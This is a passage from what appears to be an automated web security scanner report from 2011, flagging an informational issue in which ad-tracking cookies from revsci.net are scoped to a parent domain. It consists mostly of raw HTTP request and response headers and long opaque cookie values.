BHp4f29XKyXF0iX7bCrt6AOTgiss8wuNC3a/3aM/IgHRcWu3038LNW/sm7n7Gd0W4h5H72gd766m8rkC/YH8RRqsnZyX5R5wcPZLFUAJqEAOeZZjinbq/rgpxkp/x2CQ+hkPVNW2EjnMU77XaSR8pvN/HxrRF+AnH5BJ8USrrubV2etFGYmz1q0uLrxDphjCAN+lUd4NH5My9BwokFQvEeslMNVT42zlFkwpCZNLBWaUW9ajxJHkf7O1TOfSkcjuaQbwzei/zcbbxVZEzsH5nUPYbmnVGb97Da4oyNNuelVVMt7+XASLKnLONiHv3IGdI0yDuFGyHvA+QZ3g3pUbwU3ChTe2w4iMgYE0rwZZf5LpNds2gECG3zZAfbjF3KG1FCIoCjdAzYh5g5ZbWQ2jN011jYnH4ecXHdn3ceT0SJQNyxMoAA71+f1pYIn+9aH4Bk3tHrq9laUX4l9wgNgjSti9ZxOhSzb7g2fHqqygqPvS+aX0Pm0oEGQldpEekjZsQfiKBNyX/DneA7f/CypSSCNtaDDsonnfNSpBklcNi4bY/t0n2Z5WK0HCdRBJuqZJ8Nrg1tm82nxWLHf/M8k/d0VjYDc/FvxEWvtX3ZM+/++gC+QdS4Uz7JQ0KQ/Jpdh1/+8IfDEnme0rmuBVl25YTq1S32n1Z5cXUfq+9KOylWqlBE0S6zQkXZQBgIxgYl3ZoFdvE6/jtVyuh5jdSAjrzg4JebjZ774LSV6xP+redbMdzWAjZALUH23JsqOMGz8Hq/WqWP/X2IvHbrcv2IvRQyCPVRlh20+ZlqrihQ3tB/Zbzm9mE7B8DV3UXi/T4wHXgbFaAJzX5UKgpBX2CW7TkqyPtmhtZQOnfGFBneT+Vy/8uhXjkWSTt1QSpmXhydn5vcDkVl88gffwl8Ztr8ZGAiHJGpCuraCuZwkZGZ07gO81Q+Sht1LHglUiz5IlGk="; rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPUrSVjOdvHLdVqYeIBxlMqxn2qlq+GU3/0mdzPXq/jionq5x4c+ojyKdK8B09NKH31oVesZ42rHCMJiD9QnsLK82st/RhinznzFGGntKiPsE8dATX0a7kXxsHh3qUVMF7ncOiz8v+/s1x1vJ8tVDODPi+r3efdrAVVszCYFnXtRoY1LWuW/zxpIW5rKLFyvyPH+w/LO44h41A/X+wrwEHd+erIVNx9AiNzW+5mwbjLA5eet/nhPSd3Ps7LhOoWksMM12BDVV//ht/t6VfySW7rAr0h7un8Qd3fgFzLJ8bK2V4HET6BmEQD5IPW1CsNxRNLnHh1lDwLvggXdhoW7K7ScdXQ9yW+XRxtNv9jVw9o8SOBGmMmVPmpkLo7PRZsgoBTX4I1R6VDbJVY6Nhwx6GQDgcXwU58GCsl7qF6y8cctLJhWMrjc9yia5Zn6lG0pSN6aicu7FS7X/96OsZMCedjpJ66R9Allpe63BCg56e3iCLQ6M/ID93lRIs2dB/co7ZBQOUZZLskThzKz8dI5W5waKz+5UYdtz19+3hkheOJpumytNhQNGcuitgZ5si6WoQNkNncBNBu+b3CoqRnDEdrUza9ds=; rtc_PWQ_=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; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_PWQ_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uJev=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_M4Zd=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_eC0O=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mCtf=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_LA6t=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__ROU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MmhOXMMpjaBv3Bh9uxc4xrMriSJbZsgJmILMDUmufM9tNd4heJ7St7GX0DL0+fSLUTLoEm+Lgqh8P1UFkgJne7ZsOV6Ta1iuv1MzhmYhirHc/Hg4emnRkQiJyODMbw1LI67VP6jyT9H+Vu8imVtfewvZBiSnz4xalQVQYQWZHho33J8VSL//eihmZmQwg8GB3pzT6R4US7aShMFmG4Ctj87cLP7x8ykvNYOj8JjFiA2bx5/wsk+wcpVASrVvAqbFYixb4BTysfLvrp54sPQqfvv2qUGM1bx+CXDqmENqpRULiJ2hkb4NR7dWDDYzr6VgixY+eZtYUoJDHhKniAHbNTkZjJ4xM/paAPsLWLBKuaceuSA+v95s0MBcl7olnK3/TrZgcO+i4pWN/4d9UkqTT6h8PiIWDdly8STZq+P0DOG8ZdVc7BWNdCFqdEJoL43svmqhUHjpL0O5PRvajJE9TLYndlrtTsW8QZPEsrADxN1SLAvHPBpF6zrCIKNga6jMOLv6gOPdQgcAl2Nu4/L0VlD+1dFUpyE6Kf55xZrh4988vaC7FCvvrzYnOzxd3ej16GXnZ3CffZ7nP1piX8BiOYZMkMdIYCIAtLdxqlElFhHh+zW2Y+mN2GT7RmtcFpzvpUTK5i8BSBzlUVdvYrROy0=; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:37 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_imR1=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:37 GMT; Path=/
Set-Cookie: NETSEGS_H07707=82f4957c1a652091&H07707&0&4e1addb1&0&&4df433b9&1f1a384c105a2f365a2b2d6af5f27c36; Domain=.revsci.net; Expires=Mon, 11-Jul-2011 11:25:37 GMT; Path=/
Set-Cookie: udm_0=MLv3NzMJZjpn3hc5wFS81/H1SzcDYOhIvxMJqN1IP6F6114LYC9oZ++Kg6mfGZlUB4SruQLl9XR5YWUgVexUU77T0dB9naIjEG35bFZpiOLnlDdGTCH0anYyeIPEsromGmlbIRKUEZS8jq4WxhsFj39udeAFFAknY9O3Tf4J3+kK705f7d7TOVG1VssiqLhWRK38zB2hkrdv3xhH5C18JIEzrVfJ7OrBd7qc2wgPbQ7YF7hgeFC8L0yhPZXcBaFO9d8zkKTgfqjf/gPrBrSuLVMPBdPtqGGFqW/rScn+f2NyybirTIELYXPhl1lcM7K7EUyiEqFd9bweR9wPi7ExFdk9mTGHzPt+/CUM1kH3iQAFxJjIAvE7LiyAQAdlkgZQ0/Y4qtcARP2ZsXsR8+0Xie/SJRzvKN2IV5H4Hf38scui+KSPdf+44AiYo0EvEdPZGtvlPF+btZqvsm0yaUHPM2S4SyB3SA8zx9AmGT3tdIXl28LQq8W+Jw759OwqUNnBinnJvwjch3Uy/ziNDnXlpQlOUKWCF+7FMNWx+jiGEBeL128CxR9Ve7bk2/qHMSIpenGnkCmNA3wEA7iAYh0sU0XpmYGFYrIqWTSiSszv9GpWeSAavobBof/LzMp2HwcDN5Wjpu9OrFzEciMgSmQZui2dEu2ifbPb7aV7JQppNbJd8YY5pD2iMJft7eb9dHplilmuJiD++CsYwpQsHIzbAFWkaa9ZHuT4W4IKXgfvwQNqx7Pg10+Y7jkd6bRHlqW+0/qF4gbFbA3I2qwFI4fj0ZiIiRYi88MGVGyLnKcRU6e9cTg2oHjMfClFb6H4ZQ5XQXQbTUOIsJ0aP3wlL8mb8boeOsmqg/dK5TfnrpWl95b2pika9uYwjrdXt+3nno3VRDQpDDOLklHggH4gOBAs0wzTdznhALOoYj3SCnUIB03orcqMp9ak9/gx3LbD4nsL8kNPLA7ZnoIobXuRMK1RGq4hY2cG6cYZm5Mvf7oo7zZ6VELFkh7rs4MA8QgZsj8y6FF1HEIEvN/fgiI+Wij+yAMgMhKEcsVibrEGpqRLBnP4YjliPjiRiQRE9c5vTBreNR00oDO9uFdzpIsIyP4HHE/khmLThcSKZKKH+5+OPLAUnUr+/ZeBjcbc3tAKSuUrNkwLuNEKYPAfs6g4VoRjM2wNhfs4Xq6vQScQDzlW/jtWiUJKZhQmfrlufldv3r5FMG+pktQGqTNU89AFMnw53WaiUATasvqtt86OPxCyXMeqG3xoGKdF9y8YobGJcvDv3G1V/d6F12pAJBoykm60am/2kA02Xex/E9MgHL39M9M24HkqBAZpudBU8NCQFV1BzDkoGhLL6zUV+DhCKCrR2whYJHCggpMYKejEznGJYnwUva35PctcwaLHSOcSr1CjMPcHjOqzAQPso/vxmymRP91TH6Gz3m3Vs68Haupwzn9YrVuZ9e+CIWKyRlDIUf3/JjujwWA1UfX8ond66OQ0CkfYcD5wgq+2m52ayBnQ45aS0BtapiNMQcL54ySuN+Op0XObPdQNV3zmiFahFYTxFxHa0gFNhXdLu9OHHZOu1SJAPjeS0pA7ZHIDZXA29B8GK2iDlmPDGbXnH3B2J3lCsKNE3v83dCdzUlQp1yaymlblZzbPNcJFnHEC46TrJP81Nr4J0KF6oTH07Yo8tZpAf1ODAm9Ozlq1D2PD6LLqg4K9I8/F+k8eRgYtRD1C7LW+AsGTtfAjBkj8BSHUBhqGiim3OMyowQb10jUNrWUzgxTYiGeBTvvk; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:25:37 GMT; Path=/
X-Proc-ms: 5
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:25:36 GMT
Content-Length: 1550

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs=['H07710_10055','H07710_10194','H07710_10515','H07710_10534','H07710_10541','H07710_10562','H07710_50001','H07710_50006','H07710_50005','
...[SNIP]...

12.112. http://pix04.revsci.net/I09839/b3/0/3/0902121/61203636.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I09839/b3/0/3/0902121/61203636.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MmhOXMMpjaBv3Bh9uxc4xrMriSJbZsgJmILMDUmufM9tNd4heJ7St7GX0DL0+fSLUTLmEmwLgqh8P1UFkgJne7ZsOV6Ta1iuv1MzhmYhirHc/Hg4emnRkQiJyODMbw1LI67VP6jyT9H+Vu8imVtfewvZBiSnz4xalQVQYQWZHho33J8VSL//eihmZmQwg8GB3pzT6R4US7aShMFmG4Cin3im/BWv6yFReAkWBsEPdpYNcWyvDqqrnxlZZDKHJC4T+B4HODv/HJ1MLMTKLDPZ0QU3pMIyAxsUIWT8mICGsLOcWmdhqaEBzvYPOSJj9WnbTNOFR7erYJlTe5vqg+nh7RGPSoFfWPOKKA7eIQc0s3cZlY/cXec9PTKBB3c9EYPqrXEQq2Q0xXPhSvvm0z3G3fT464on9jTU71pl5AYGUbs4WM4OQkRXWS+0a/nigHuUv1xHdo2a6bSKSKIb/0GyOZosEwZGpyl6bHp1kzYthmcSdk8hKB0K5O+mZK0aPMFj2roV9o9cqR0AOQ2tocmyoUJ7tyDwddA+5QR/KozVe66ER8T/jt1d6+8MX6nNkHtR7+GesgMMXOsP+b9VIgBA87ZrYflyi2FVT99x9GYMttPMy+zevVH2acul11RVwPQBtE7owiVQ3MF3r1cv2OiOyE=; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:24:00 GMT; Path=/
rtc_ATjy=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:24:00 GMT; Path=/
udm_0=MLv3NzMJZjpn3tvXN5qKIC+r63dQ4yV9iELcnt71VAcNP2TS4VlY4qSUGIMEVAYaUgmC7NU5revyXGNDe6v94gej2Ll1GWFFI2dH8k8lH1Ff21rKYxBzEbfkIA6N1ceTv+CvvfjLsErHWoX5Gbjv2eZyB4ELvHcydkAB+4bsC1I8le8u0u2Nd62YKRy8fcbsfFXXvRnUvaThTv3rzkv5CspRh2AzR6Aq9AyCgdVUZt774IR6jHsRIBaMVZ2/xLS2qb7AHJHICWQ/NvbFV5Egx+drUzogzecJzP1F9a7I72Rys3wYTJFG4RinOPTkqIgWX5YFQgf/NKLe8L9amhNQwFzPB81z8oqo73xqWnOsn/fJsgbUsHNKqwLLR9J8JdJ7OKKrHbFOHKcHjwneMvgXl68SpRzvSN0JVpH4Hf38scui+KQPdP+44AiYo0EvENPZHNPtPF+bsZqXUpOymEDNNWA4SyB3qM4zx9AmmT3tdIVl28Dwy8W+Jx7pdO0qUFnOCnhJsABSm88OzwmOSOPO1QlKU6WCV+6lMNW5ej+BEAeTt4/CxR5RfLbEIJXMNeszvYnggs/CpF6rtt+XdK84ARx9U7ptksbISkviNi5gh+Q5kuui32Mq11E0BU1Omq20x7z02L88yBbkTNLnd9QGDFmUpXQwHHPPVCwcONPHOixRrf8NdCD6eo6Iln9PJEhpkm5dP+ncCFO/8C5nzpmHmIQwXUoYgEQpDKK2DqFIM5I0LPFuzwam8tGmCsqpj3nSMUSemS4ddro4IHbouqYkBZKb3PvFcweuPHX2kdvMJc67YNbP8FoISMdqftdea7X4LkuqSrXLpkGZRyor+87U90qdc9TPuDQ2aMyMMrz4e41O2ox0W1POv493D35oj/Q9OfwwO/G5RQpWrl7cqLP+BasJf8NXYcXHahoNm0WzkkJzPTGroDv4e/GgHuLnlJG5RxtWe70Vn6qHa2OCQswMVPfVkZYTCy6VlfcXZ7oo7/d7NEJFnR7rswMA8QgZUj4x7FV1HKIFvF/fguK/WyjOyMPh8hKEMqG67zMHplbxUSMxgYT1myVPFa53tz2mZYu23+IrOg/UHvaMCXUsRZhh6FWVrSbbvRY8j93s/aqTJkrLl+pjtt/OvKVtVmBpN3++gFjVXp4q0LmGbHTipP2vL/GjDRPiZ9yx49irzr2r0onHsl1Vjr/Cwkuk08ERklhyhwMHLxkJ6YQXGpes1+sMBwXp8CGGGdM2+0HzAka7dzGwrNBbBs6J01OG9x/tDIPZljHDG5gsF+COVZbJf053d89jdm154jmkvlNpWdZSIHdFFtOHvRgA1/PKM8aLL1HmFEuQwCvlv9MG89tdgRa2UuyxZSMa1cESib+FfYMS2kuJaXtUHegaBknXyA7vaG45OpdEeqF3jXrfWHHT8AxqowUMDaiPf4aGn2Q6LDAANMyC6Sne+nBs7ov91EPV8J58LciHAS7kVJuDKDnLsaAPFHJ648njM/zqsa4QGM8fGHnMO6qxFa1n5bvWAMaIYhHpE6uYW/PM8O4xn3d2q6/8X0aG5+ltW70guqCRrp0YlT1I7cns/cpycCZ+JXxVHlpQRG0WEHmrNIs4SIjneCtxFv1zPKrC5XjhYvrEoETpGXAlXNUVSzJzF29KqRnFwzhNK4vvDwHPPEkpJ5z5kbXqD/iKFodzrHoLyV0xo3gsNgoG21UzMmA/dKjA81DNpwgOWLcCArKhUu+pAkSh1FwNKcWITb+Dy1swWctPgSJNis01jl/5Zvo7; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:24:00 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /I09839/b3/0/3/0902121/61203636.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.ugo.com%252Ftv%252Fgame-of-thrones-baelor-preview%26DM_CAT%3Dugo%2520%253E%2520filmtv%2520%253E%2520undefined%26DM_EOM%3D1&C=I09839 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e047724&2&10055,10194&4dde515c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; 